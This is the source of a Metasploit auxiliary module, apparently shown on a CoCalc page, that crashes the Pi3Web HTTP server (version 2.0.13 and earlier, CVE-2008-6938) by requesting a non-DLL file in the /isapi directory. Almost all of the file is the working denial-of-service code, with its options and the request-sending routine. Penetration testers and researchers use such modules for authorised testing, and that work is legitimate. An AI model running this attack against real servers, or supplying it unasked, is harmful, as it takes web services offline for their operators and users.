CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
      'Name'           => 'Pi3Web ISAPI DoS',
13
      'Description'    => %q{
14
        The Pi3Web HTTP server crashes when a request is made for an invalid DLL
15
        file in /isapi for versions 2.0.13 and earlier. By default, the non-DLLs
16
        in this directory after installation are users.txt, install.daf and
17
        readme.daf.
18
      },
19
      'Author'         => 'kris katterjohn',
20
      'License'        => MSF_LICENSE,
21
      'References'     => [
22
        [ 'CVE', '2008-6938'],
23
        [ 'OSVDB', '49998'],
24
        [ 'EDB', '7109' ]
25
      ],
26
      'DisclosureDate' => '2008-11-13'))
27

28
    register_options([
29
      OptString.new('FILENAME', [ true, 'File in /isapi to request', 'users.txt' ])
30
    ])
31
  end
32

33
  def run
34
    begin
35
      o = { 'uri' => "/isapi/#{datastore['FILENAME']}" }
36

37
      c = connect(o)
38
      c.send_request(c.request_raw(o))
39

40
      print_status("Request sent to #{rhost}:#{rport}")
41
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
42
      print_status("Couldn't connect to #{rhost}:#{rport}")
43
    rescue ::Timeout::Error, ::Errno::EPIPE
44
    end
45
  end
46
end
47

48